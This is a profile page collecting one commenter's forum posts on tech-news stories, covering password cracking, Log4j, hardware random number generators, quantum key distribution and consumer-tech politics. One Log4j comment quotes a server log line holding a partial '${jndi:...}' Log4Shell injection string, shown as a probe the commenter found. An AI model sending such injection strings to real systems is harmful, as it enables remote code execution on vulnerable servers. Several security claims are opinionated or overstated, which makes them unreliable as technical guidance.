* Posts by Paul Uszak

77 publicly visible posts • joined 20 Jan 2009


Microsoft, Google do a victory lap around passkeys

Paul Uszak

So everyone's password is literally "SECRET"?

To you reading this post - is your password "SECRET" as well?

It must be as that's the only way 4000 password can be cracked per second. There's no other possible answer as all of the sites mentioned in this article obviously use salted key derivation functions (KDF). So rainbow tables are out with good salts (>=128 bits). And who's going to try millions of potential candidate passwords if all take 0.1 second to initially authenticate and then have exponential back off delays before the next login attempt is allowed? And where does all the RAM come from if the KDF is memory hard (e.g. Argon2) and requires 100's MBs to directly try an encryption key?

I'm pretty sure that the NSA is not trying to crack my skateboarding turtle with parrot video site.

What am I missing?

Tesla to license Full Self-Driving stack to other automakers, says Musk

Paul Uszak

Re: Attempting to Outsource Potential Legal Liabilites

And in the case of a fully self driving car clocked by a speed camera doing 40 in a 20 zone... Who or what gets the points?

Let's have a chat about Java licensing, says unsolicited Oracle email

Paul Uszak

Audit? We don't want no audit.

What's this about Oracle "auditing" companies? By the Oracle police? We use Java where and how we want. If you want to "audit" us, I suggest bringing a court order, armed police or destroyer droid. Otherwise you risk annoying James on the front desk (ex. Royal Marine sergeant). But doesn't work Tuesdays... damn...

Florida man insists he didn't violate the law by keeping Top Secret docs

Paul Uszak

Re: Incredibly dangerous/stupid.

But that's my point. Walt will have so much dirt on Trump. There's probably other 'stuff' that hasn't attracted the FBI's attention yet. If Walt starts thinking that there is no love for him from Trump (or at least his team), he might think that he has to look after himself too. It is so in Trump's interest to keep Walt sweet as he can burn him. The FBI would drop charges against Walt in a second if they could get a President.

Paul Uszak

Incredibly dangerous/stupid.

I can't believe this. Why did Trump/his defence team not make absolutely sure that Walt had every resource he possibly needed? What if Walt now gets angry? Raises hand, says "Plea deal please. If you clear me, I'll give you the President"...

UK seeks light-touch AI legislation as industry leaders call for LLM pause

Paul Uszak

Re: AI MPs?

Hence the suit and wig. And keep the citizens at least 100 yards away.

Paul Uszak


I foresee a future (perhaps next month), when researchers drape a cheap suit and wig over a ChatGPT server and call it an MP. How will we tell the difference?

Anyone want an International Space Station? Slightly used

Paul Uszak

It's really obvious what to do...

“Code zero, zero, zero. Destruct. Zero!”

By order of Canonical: Official Ubuntu flavors must stop including Flatpak by default

Paul Uszak
Thumb Up

Thanks goodness!

My experience of all of these 'all-dependencies' installation systems (appimage/flatpak/snap) is that they don't work. Examples:-

Most can't see /tmp so you end up putting temporary files all over the place, making your machine look like a Windows one.

Some can't see the network. Just where do you put your files?

Some can't see printers. Like Inkscape (which I kinda understand as it's an icon generator, but).

Appimaged Audacity can't even produce sound! I wonder how that was tested?

Only apt seems to work properly with full access to resources. Unfortunately politics means that many applications are no longer available in that form. Why does Linux desktop have to be so difficult? Because it's free.

Conversational AI tells us what we want to hear – a fib that the Web is reliable and friendly

Paul Uszak

I'm not worried.

I too have a stash of toilet paper and Tuna fish (one can be bartered for the other). But, ChatGPT/Bard/AI are scary at the moment as they're free running (as in their owners can do what they want.) But wait till an 'event' occurs. Three examples:-

1. The AI comes up with a totally new 'challenge' that directly leads to the death of a child.

2. The AI produces lyrics that are extremely similar to something Taylor Swift wrote.

3. The AI allows some punter to get 10 straight wins on the horses.

Then the AI systems will be the scared ones storing e-toilet paper as regulation falls from the sky...

India sets USB-C charging deadline for smartphones

Paul Uszak

Re: So much for "Brexit freedoms" eh ?

If Duxit and Bexit are true, then that's bad news for England.

The EU president publicly stated that at all costs, it must be the case that being outside the EU is worse than being inside. That could mean them hardening their attitude to England, further increasing our transaction costs and no prospect of resolving the Northern Ireland Protocol to disincentivise the Dutch and Belgians.

But then, that's exactly Westminster's attitude to Scottish independence. So ho hum...

Paul Uszak

Re: So much for "Brexit freedoms" eh ?

And, the cables will have to have a current capacity up to 4 electro-pints.

Open source 'Office' options keep Microsoft running faster than ever

Paul Uszak

"I have never seen a company using an opensource office tool"

That's right. There aren't any unless they're mom and daughter sandwich shops. Imagine appealing a High Court ruling with LibreOffice. Imagine tendering for a new hospital build with LibreOffice. Imagine sending a piece to Vogue with LibreOffice. No, no, no.

The reason no one uses LibreOffice is that no one of stature uses LibreOffice. Why else do we teach our school children to use MS products?

EU makes USB-C common charging port for most electronic devices

Paul Uszak

Apple will still sell proprietary chargers anyway and make more money still.

What's really in the Radio Equipment Directive? Has anyone checked the detail? The rules now say there must be a USB-C port on those relevant devices.

So what? That doesn't affect chargers. USB-C is a data cable as well as a power cable. Apple will make smarter chargers that talk to the OS/firmware of the device and acknowledge each other. Probably with some cryptographic signature. Common 3rd party chargers will not be able to replicate the handshake, so Apple products will only charge with Apple signed chargers. Then forcing you to buy either genuine Apple, or Apple licensed chargers. And due to all of the additional complexity thrust upon them by the Socialist EU bureaucracy, Apple unfortunately have to charge more for them. Remember that it's for your safety which is Apple's number one priority.

Shame on you EU. I had an old Dell 19V charger with a really common jack plug. Yet it talked over the DC wires with the laptop's firmware so no 3rd party charger would work. That was probably for my safety too. And it's why I no longer buy Dell anything. Also think John Deer tractors.

New York to get first right-to-repair law for electronics

Paul Uszak

We don't want that here.

Why the hell are we talking about the US on this English website? Non of this applies here, and the English are too stupid to allow it. Safety comes first and foremost. Don't forget that the CGI Lurpak man on a skateboard wore a helmet in case he fell and got hurt. I'm honestly ashamed.

A précis is: How can I change my oil filter on my 2022 Mazda 6? How do I change my HV light bulbs without being killed? I can't because the service manual is secret. Get that done Boris, or would you rather have your flat re-redecorated courtesy of Ford?

Canonical puts out last update to Ubuntu 20.04 before 22.04

Paul Uszak

Re: Compare cars and computers

Lucky you.

My car's SatNav needs a major update - it's constantly in the Grand Canal in Venice (£150), the screen wash is gone, oil & filter needs changing and the engine flushing. It never fully recovered from me accidentally putting diesel into the petrol tank. Sump plug leaks. Plus the tyres are half flat as they've perished. Wipers are split and the driver's side mirror is taped on. It has no 2nd gear.

God how I wish I could just go online and update the damn car...

P.S. Before anyone says it, I don't mean via webuyanycar.com. I'm attached to Henry.

Something 4,000 light years away emitted strange radio bursts. This is where we talk to scientists for actual info

Paul Uszak

Re: Lizards

Don' fret Rob. Just wait till 2024.

OpenShell has been working on a classic replacement for Windows 11's Start menu

Paul Uszak

Yet what about Windows 12 & 13's breakages?

I've read that the advanced dev /marketing teams are looking towards Windows 13 after just finalising the bulk of 12's appearance. Wired have MS poaching several of the Apple graphics artists. I guess MS have to do that to compete with iOS 16's release. What's all that going to break?

Unless 13 is considered unlucky, and they go with Win'26.

The James Webb Space Telescope has only gone and deployed its primary mirror

Paul Uszak

"A camera would be nothing be(sic) PR."

A. Does anyone remember the oxygen consumption of Apollo 14? What is the current main data transmission rate of Voyager 1? Can anyone imagine the shape of dust storms on Mars?

B. Does anyone remember Neil Armstrong climbing down the ladder onto the Moon? Have you ever witnessed a total solar eclipse? Have you ever witnessed a launch of the space shuttle?

Which excites you the most, A or B? PR is everything. Unfortunately scientists and engineers don’t really understand that. Science does not speak for itself. If the JWST didn’t have cameras, then put them on. Figure it out; it’s NASA. Hire an advertising firm. They did it for Apollo 11 which also didn’t need the additional complexity.

And this is what Musk, Bezos and Branson understand. This is why the Millau Viaduct is widely known as having been built by Norman Foster. This is why was Trump, and why he could serve another two terms.

I respectfully yet forcefully suggest that all science and engineering courses should include marketing components. Otherwise we’re all going to end up like Nebraska.

Secure boot for UK electric car chargers isn't mandatory until 2023 – but why the delay?

Paul Uszak

Re: Solution to car charger issues...

Tsk, tsk. Of course I was referring to the new pound coins. The ones with Bluetooth.

Paul Uszak
IT Angle

Solution to car charger issues...

Why not just put pound coins into the all mechanical machine? Like those little bubble gum dispensers. Then turn the silver handle to get the juice. Hack that. It could also dispense bubble gum for use whilst charging.

Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching

Paul Uszak

I suggest that this is a manifestation of the open source movement, and I'm being nice (honest). It would take a lot to persuade a commercial vendor to include all this (unnecessary) stuff into a retail library. Time is money and there's probably little user demand for JNDI/RMI/LDAP features in logging.

But all commercial/managerial sense goes out of the window for most open source stuff. If you're doing it as an unpaid hobby, they why not? It's fun. Some might even consider it art. Anything goes if there's no market strategy (and there's no market). New features creep in unchecked as young developers 'play' with the latest cool thing, irrespective of whether there's any demand for them. Therein lies the RMI and the problem...

Paul Uszak

This is all very complicated and I don't understand it. A logging library needs JNDI, RMI and LDAP functionality? Beyond PRINT (message)? Maybe it's a joke. Very fortunately, I use JULI Commons and I've just found:-

GET /$%7Bjndi:dns:// HTTP/1.1" 404 878 "${jndi:dns://}

in my web server log file....

How to destroy expensive test kit: What does that button do?

Paul Uszak

Re: Expensive test equipment

Alternative networks? You mean police/FBI Stingers?

ESA's Mars Express picks up plaintive bleeps of China's Zhurong rover, adding much-needed comms redundancy

Paul Uszak

Faster than Plusnet then...

Another brick in the (kitchen) wall: Users report frozen 1st generation Google Home Hubs

Paul Uszak

Re: Why is Google not liable for damages?

With respect, bollocks.

Go on and try. Go to Curry's and try to take back your three year old TV that's now been bricked. Explain your consumer rights. Draw a diagram. Cause a scene. The Saturday girl will press the panic alarm, the police will be called. Then you might be tasered because that's the most convenient thing to do before lunch break. The police might use chemical weapons on you too. There were 492,000 recorded incidents where a police officer reported the use of force on an individual in England and Wales in the year to March. Argos is probably the same.

If it bricks, count yourself lucky that it was the device and not you. I'm referencing Jordan Walker-Brown who'll never walk again. Now about that TV...

Paul Uszak

Why is Google not liable for damages?

Isn't it time that legislation was passed to recover damages from the up-daters?

If you take your car to the garage for an MOT and it falls off the ramp and is damaged, the garage is liable. Same with services delivered to patients at a hospital. Surely Google/IT provider should be liable for damages too. Either fix the code, or if totally bricked replace it. This would force companies to test upgrades rather than have the end users do so.

I understand that software is a little different to hardware, but is it actually? Is it only different in the consumers' minds because they want us to think that way? Now extrapolate and go forward in time. I foresee all products having embedded software and network connectivity. What if all my beer cans get bricked due to a wonky ASDA.OS up-date and I can't remotely open them? I'd want pre-cooled replacements.

Perhaps the consumer needs a paradigm shift.

Product release cycles are killing the environment, techies tell British Computer Society

Paul Uszak

Complete waste of time.

:-( I can nullify every single argument anyone will ever make with one simple word: "Safety".

Think your phone is snooping on you? Hold my beer, says basic physics

Paul Uszak

Re: This is mildly terrifying

"If you give me six lines written by the hand of the most honest of men, I will find something in them which will hang him."

It had to happen: Microsoft's cloudy Windows 365 desktops are due to land next month

Paul Uszak

Re: So now

You've misunderstood the Book:-

A "new heaven" and "new earth" (Azure) replace the old heaven and old earth. There is no more suffering or death. (21:1–8) (no more need for patching).

God comes to dwell with humanity in the New Jerusalem. (21:2–8) (Bill walks amongst us/the poor, not in armoured helicopter).

Description of the New Jerusalem. (21:9–27) (Microsoft campus on Mars).

The River of Life and the Tree of Life appear for the healing of the nations and peoples. The curse of sin is ended. (22:1–5) (Linux is defeated and we are shown the way of the Cloud).

And in Conclusion:-

Bill's reassurance that Windows 12's coming is imminent. Final admonitions. (22:6–21)

Tim Cook: Sideloading is a disaster and proposed App Store reforms would harm user privacy and security

Paul Uszak

Re: It wouldn't be for people who like to tinker

Deleted by unpatriotic socialists who don't' respect the will of the people. This is why President Trump is endeavouring to curb the bigotry and censorship of big tech.

Paul Uszak

Re: It wouldn't be for people who like to tinker

>Firearms have the potential to hurt people and few other uses.

One of those uses is to enforce democracy.

Kaspersky Password Manager's random password generator was about as random as your wall clock

Paul Uszak


Oh dear. Rolling your own crypto :-(

Please read https://crypto.stackexchange.com/questions/43272/why-is-writing-your-own-encryption-discouraged .

Plus 6.1E15 is nothing. Sorry. Stick to the tried stuff, or try to use one time pads if security is of such concern. But for that you'll need access to a trusted TRNG. Which you'll have to build yourself. 100% un-breakability comes at a price.

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

ERNIE: It wasn't a differencing operation. It was simply amplifying the electrical noise on a QS92 regulating valve (http://www.r-type.org/exhib/aag0022.htm). That then gated a counter and the numbers popped out using:- https://i.stack.imgur.com/cHpf9.png.

TrueRND: I too have one :-( Not really happy with it. But please remember on what article we are commenting on/getting excited. There is a concept called computational indistinguishability. That means you cannot differentiate a pseudo random sequence from a truly random sequence, no matter how hard you try. It's just the maths/statistics. That applies to TrueRND too. That's why the only solution that provides 100% confidence is a self build.

But most don't care, so ignore my ranting and I've got the lawn to mow...

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

It's this easy, If you have batteries and a Zener diode:- http://www.reallyreallyrandom.com/zener/breadboard/

Just suck up the entropy with a microcontroller of your choice.

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

Actually NIST doesn't. Not for crypto. That's a common fallacy. It's in the front matter, quoting from NIST 800-90b:-

"This publication has been developed by NIST in accordance with its statutory responsibilities under the [Federal Information Security Modernization Act (FISMA) of 2014, 44 U.S.C. § 3551 et seq.](https://www.congress.gov/113/plaws/publ283/PLAW-113publ283.pdf), Public Law (P.L.) 113-283. NIST is responsible for developing information security standards and guidelines, including minimum requirements for federal information systems, but such standards and guidelines shall not apply to national security systems without the express approval of appropriate federal officials exercising policy authority over such systems. "

Which says:-

"§ 3553. Authority and functions of the Director and the Secretary:-

‘‘(d) NATIONAL SECURITY SYSTEMS.—Except for the authorities and functions described in subsection (a)(5) and subsection (c), the authorities and functions of the Director and the Secretary under this section shall not apply to national security systems.

‘‘(e) DEPARTMENT OF DEFENSE AND INTELLIGENCE COMMUNITY SYSTEMS.—(1) The authorities of the Director described in para-graphs (1) and (2) of subsection (a) shall be delegated to the Sec-retary of Defense in the case of systems described in paragraph (2) and to the Director of National Intelligence in the case of systems described in paragraph (3). "

So, good enough for the people, but not (US) national security?

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

Read you loud and clear. Some of us are already trying to do that:-


Quantum Key Distribution: Is it as secure as claimed and what can it offer the enterprise?

Paul Uszak

Re: So the whole point is?

Well I think that you'd have to be in the presence of the fibres. Perhaps you could tie a really tight knot that would choke off the internet. The keys wouldn't be able to get through if the knot radius was less than the diameter of standard cryptographic photons. Or use plumbers' freezing spray to really slow them down.

Paul Uszak

Re: So the whole point is?

Err, no. The system is quantum as it deals with the generation, transmission and measurement of photon polarizations. The point is (quoting from the BB84 paper, https://arxiv.org/pdf/2003.06557.pdf):-

"...when information is encoded in non-orthogonal quantum states, such as single photons with polarization directions 0, 45, 90, and 135 degrees, one obtains a communications channel whose transmissions in principle cannot be read or copied reliably by an eaves­dropper ignorant of certain key information used in forming the transmission. The eavesdropper cannot even gain partial information about such a transmission without altering it a random and uncontrollable way likely to be detected by the channel's legiti­mate users. "

So I can send you 'stuff' with 100% confidence that no one has read it.

Paul Uszak

Re: Abe Lincoln knew the truth about QKD.

Please don't conflate a self-serving political system and the industrial-military complex with a cryptographic protocol. The article was about the protocol. This is why these threads go off the rails.

If you have insight into how QKD is cryptographically flawed that the organisations I listed don't, please put up. Mathematical detail would be a bonus :-)

Paul Uszak

Re: my "QKD for managers"

Oh dear. You've gotten the concept upside down. Interception is irrelevant. The beauty of QKD is that it is ALL about identity. The identity management comes from the Observer Effect of quantum physics. Any photon that is observed changes state. That's fundamental to the Universe, and exempt from any hardware resource considerations.

A "true MITM" relay would introduce measurable bases errors at the rate of an additional 50%. When Alice and Bob compare their expected results, the attack is detected. That is QKD's raison d'etre. The original BB84 article is here: https://arxiv.org/pdf/2003.06557.pdf

And that's why everyone is getting QKDNs.

Paul Uszak

Abe Lincoln knew the truth about QKD.

He's attributed to have said "You can fool all the people some of the time and some of the people all the time, but you cannot fool all the people all the time."

But that's exactly what quantum deniers (QD) are espousing. Any relation to QA? The banks, the governments (https://spacenews.com/governments-ally-for-federated-quantum-encryption-satellite-network/), the universities, the militaries, Europe (https://spacenews.com/europe-picks-euroqci-satellite-quantum-communications-consortium/) are all going for QKDNs because they're secure when correctly implemented. They allow mathematically unbreakable one time pads to be distributed and used.

But of course they're all fools. We here know the truth, eh?

Paul Uszak

Re: my "QKD for managers"

And perhaps a more balanced answer: https://crypto.stackexchange.com/a/51364/23115.

Reiterating: The fundamental point is that you need to keep implementation distinct from protocol. AES-GCM is also pretty weak if the key is on a Post-it stuck to the monitor. As is RSA/DH if the random number generator is weak/subverted. Everyone should just calm down.

Mine's the one time pad over there...

23. 712. 3. 608. 45. 89. 11. 332. 841. 255. You want more? Cloudflare and pals are streaming 'em live from new RNG API

Paul Uszak

/dev/random ?

For those lucky enough to use Linux, there's always /dev/random for information theoretic secure random numbers. That will get you 10's of kbits/hr simply using your machine, and 20's of kbits/hr using PornHub. And there's /dev/urandom for infinite amounts of cryptographically secure numbers. We need education, not a lava lamp service...

It's nearly 2019, and your network can get pwned through an oscilloscope

Paul Uszak

The Rigol 1054 is one of the most popular scopes in the DIY space. It's brilliant for the price of ~£370. And it's wide open at the back too. No authentication at all, helped along with automatic DHCP so all one need do is to shove a network cable up it's ass and it's on line.

You get full remote control of the scope, as well as total access to the sampling data. So you can read the wave forms from my little circuits. Great! The real issue is that this is a powered and networked computer with no sign on whatsoever. It may already be the case that it can be made to execute code remotely, due to some bug in the LXI command interface. What if you then can load malware onto it via Ethernet? Could you simply brick it for a bit of fun, or use it as a clandestine staging post for further exploits? Stuxnet-LXI perchance?

My nightmare is that my oscilloscope might be taken over and connect with my on-line wine chiller...

RIP... almost: Brit high street gadget shack Maplin Electronics

Paul Uszak

Why are you all dissing Maplins?

I don't understand what everyone's on about. They're an excellent shop. Look, you can buy a drill - https://www.maplin.co.uk/p/maplin-18v-lithium-ion-cordless-drill-n29lk. Just where else could you get one of these fine electronic devices (with built in batteries)? Not Toys'R'Us eh? And it's in stock at my local store. Save me a trip to Argos that will...

SK Telecom makes light of random numbers for IoT applications

Paul Uszak

I'll be queuing to buy one if I can just prove that mine's not simply outputting SHA256[NSAKey || CPUId, time_t].

Why don't people secure their IoT gadgets? 'It's not my problem'

Paul Uszak

So In summary...

... it it better? Considering all the problems of connected devices, and all the advantages, are we better off? Consider this in the wider context. It provides jobs and entertainment. Some smart stuff is actually life saving / life enhancing for the disabled. And it helps the terrorists. Some smart stuff also kills terrorists. So...

[Personally, I don't think that we are holistically better off with the IoT but I'm getting old and grumpy.]

Google's driverless car: It'll just block our roads. It's the worst

Paul Uszak

The courts will decide

Google and technology will not decide the viability of driver less vehicles. The courts will. What happens when the first child jumping out into the road is killed? Cue the lawyers. It will go to trial and the courts will have to decide who the defendant(s) are. It's likely that they will just ban that type of vehicle as surely as Segways are banned in Europe.

BMW tried a similar "advancement" when they brought out that weird motorbike with a fully surround roll cage. The idea that you wear a safety harness and have a roll cage might mean that you don't have to wear a safety helmet, thus making a motorbike more appealing. Unfortunately, the law says that on all two wheeled vehicles the driver has to wear a helmet. The project was cancelled.

NASA quandary: Should Curiosity channel Fast and Furious for Martian dune-buggy jump?

Paul Uszak

Re: So, they landed it in a hole...

"NASA is really, really good at going slow and careful."

Tell that to the relatives of the Challenger crew.